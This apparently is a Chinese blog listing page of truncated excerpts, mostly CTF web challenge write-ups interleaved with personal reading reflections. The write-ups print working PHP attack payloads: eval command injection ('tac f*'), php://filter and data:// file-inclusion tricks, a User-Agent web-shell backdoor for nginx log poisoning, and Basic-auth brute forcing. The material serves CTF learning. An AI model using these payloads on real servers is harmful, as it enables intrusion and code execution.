hacker
未读web 25412345678910111213141516171819202122232425262728293031323334353637383940<?phpinclude('flag.php');class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this->isVip; } public function login($u,$p){ if($this->username===$u&&$this->password===$p){ $this->isVip=true; } return $this- ...
hacker
未读web 29通配符绕过
题目
123$c = $_GET['c'];if(!preg_match("/flag/i", $c)){ eval($c);
preg_match :匹配正则表达式 模式分隔符后的”i”标记这是一个大小写不敏感的搜索 模式中的\b标记一个单词边界,所以只有独立的单词会被匹配,如:
123if (preg_match("/\\bweb\\b/i", "web")) :Trueif (preg_match("/\\bweb\\b/i", "website")) :False
小技巧:如果仅仅想要检查某个字符串是否包含另外一个字符串,不要使用 preg_match() , 使用 strpos() 会更快。 payload: (这里利用tac命令 同时记得加分号; )
1../?c=system('tac f*');
web 30题目
123456$c = $_GET['c'];if(!pr ...
晚上作为读者, 看书之后大脑里的部分思绪(或者想法),以此记录
此文为信狐狸变作公子身, 灯夜乐游春“纯文笔”
“欸 好啊”
以为是短篇小说
……
看完却无法平复心情
好干净的语言 好平和的内心呐
真切看到了一个干净纯粹的生命
这才是我最喜欢的文字
字里行间的是诗意
忽而又有似曾相识的感觉
好像许久之前我也是这样的人吧, 什么时候开始, 我写不出心里的感觉了..也没有试着去写过了
因为没人看吧
“自己也不在乎自己的想法吗?”
那不能, 对于不开心的事情自然会有不舒服的感觉吧
“感受和想法已经分不清呢”
不知道
从这里惊奇发现的种种, 仿佛自己早已经失去了
“你不做自己 很久了”
自从放下手中笔, 太久太久没有感受到如此的交流
那种不等待回应的交流
和文字本身的交流
(电子输入太扼杀文字啦, 不然我也不会存那么多表情包qwq)
我终于感到也许是太多人急于表达他们自己心中”理想”的自我
每每听到”我这个人..””我一般..””我其实..反而….”诸如此类的话语 , 按着我的头听ta定义 (或者解读?) 其自身是一个如何复杂神秘的大人物时, 往往让我感到悲伤又烦闷
需要正确, 这是庸俗人的标 ...
0x01 伪协议
PHP伪协议,也称为PHP流包装器,是一种在PHP中用于访问各种数据源的机制。这些数据源可以是本地文件系统、远程文件系统、PHP代码、压缩文件等。PHP伪协议允许开发者以统一的方式处理这些不同的数据源。
以下默认为: include $_GET[‘file’] , 且/?file=
1 ) file: //用于访问本地文件系统
1file://../../../../flag.php
2 ) http(s): //用于访问HTTP或HTTPS的URL
1http://www.CH0ico.fun/index.html
3 ) ftp: //用于访问FTP服务器
1ftp://ftp.example.com/pub/flag.txt
4 ) phar: //用于访问PHP归档文件(Phar)
1phar://../../../choco.phar
5 ) data: //用于将文本或base64编码的数据作为字符串流访问
data 伪协议是一 ...
RE_起点
0x01 Reversing-x64Elf-100exeinfo 64 位 ELF 文件,无壳
IDA 分析有 main 函数 , 跟进 (反编译)
1234567891011121314151617181920__int64 __fastcall main(int a1, char **a2, char **a3){ char s[264]; // [rsp+0h] [rbp-110h] BYREF unsigned __int64 v5; // [rsp+108h] [rbp-8h] v5 = __readfsqword(0x28u); printf("Enter the password: "); if ( !fgets(s, 255, stdin) ) return 0LL; if ( (unsigned int)sub_4006FD(s) ) { puts("Incorrect password!"); return 1LL; } else { ...
重读人间失格前言一本高中附庸风雅买的小书, 似乎是某次月考结束买回家放松的 (彼时除了读书几乎是一切活动都被禁止了)
当时只为书中之人所感慨, 也有部分的同情和理解, 看了两遍也就束之高阁了, 结果大学之后突然觉得书中之人与本人如此之相似, 又或者我潜移默化的受其影响如此深刻.
于是再拿出这本书细读摘录, 也算是反思自身以及当今的社会形势是否和太宰治时期所处环境一样
本文预感会摘抄非常之多… 那么就开始和太宰治先生对话.. (跳过部分用符号…等价 , 原文并无这种标点)
手记之一关于吃饭还有, 我也从不知道饥肠辘辘是何等滋味…这倒不是故意炫耀自己生长在不愁吃穿的富贵人家, 我还不至于那么愚蠢, 只是真的对饥肠辘辘的感觉一无所知…“人不吃饭就会饿死”, 这句话在我听来, 无异于一种讨厌的恐吓, 但这种迷信(直到今天, 我依旧觉得这是一种迷信) 却总是带给我不安与恐惧“人不吃饭就会饿死”,在我看来, 没有比这句话更晦涩难懂 , 更带有威吓性的言辞了总之,我对人类的营生仍旧迷惑不解
幸福自己的幸福观与世上所有人的幸福观格格不入, 这让我深感不安, 并因为这种不安而每夜辗转难眠乃至精神发狂尽管 ...
web 11234567891011121314<?phpclass User { public $username = 'admin'; public $password = 'secure_password';}$a = new User();echo base64_encode(serialize($a))."\n";
EXX不是”恶心心” 是 xxe 漏洞
查看源码
123456789101112131415161718192021222324252627282930313233<script type="text/javascript">function doLogin(){ var username = $("#username").val(); var password = $("#password").val(); if(username == "" || passw ...
[toc]
一. 回顾是和 D3v3n 和 Lst4r 一块组的三人小队
9671 分, 排名 4/137
自己的话是 6 道 web 做了 5 道, 剩的一个 java 反序列化, 其他时间主要是在 MISC 方向帮帮队友. 密码 wish 套了个简单 web, 也算是看了眼题目
二. WP_Web1. Auto Unserialize [normal]这题的话正好比赛结束的时候 rd 问我了, 趁着刚好复现了就写了个比较详细的 wp , 这里直接黏贴过来了
虽然是一个有 16 解的 normal 难度的题目 , 但是从中却学到了不少东西, 题感也更像做过的为数不多的 web 题目 , 运气不错居然抢到了三血 ( 不容易 QwQ )
以下 wp 并不完全按照原题顺序分析
1) 文件上传123456789101112131415161718if (!empty($_FILES['file']['tmp_name'])) { $tmpName = $_FILES['file']['tmp_na ...
hacker
未读web 78 php 协议php://filter/read=convert.base64-encode/resource=flag.php
web 79 data 协议/?file=data://text/plain,("tac flag*");?>
web 80 日志包含配合日志文件进行 getshell,日志会记录访问 UA 信息,修改 UA 信息为后门代码,包含即执行后门代码
抓包->查看中间件->是 nginx
抓包->将 UA 改为后门代码->forward
包含:var/log/nginx/access.log
1/?file=/var/log/nginx/access.log
日志里会记录访问时间,访问者的 UA 信息->将 UA 信息改成后门代码->写入 log 文件(任何文件后缀都能被当作脚本去执行)
1User-Agent: <?php eval($_POST[c]);?>
web 81 日志包含响应头 ...
hacker
未读web 21以: username:passwd 然后 base64 加密 (a:a >> YTph)
Authorization: Basic YTph
发送 Intruder
payload : Custom iterator
option : < username >+< : >+
process : encode.base64
注意 需要取消勾选自动的 URL 编码
web 22子页面爆破 ( 跟御剑扫一样
挖掘工具 : BP 或者 在线子域名爆破 (zcjun.com)
web 231. python 爆破12345678if(isset($_GET['token'])){ $token = md5($_GET['token']); if(substr($token, 1,1)===substr($token, 14,1) && substr($token, 14,1) ===substr($token, 17,1)){ if((intva ...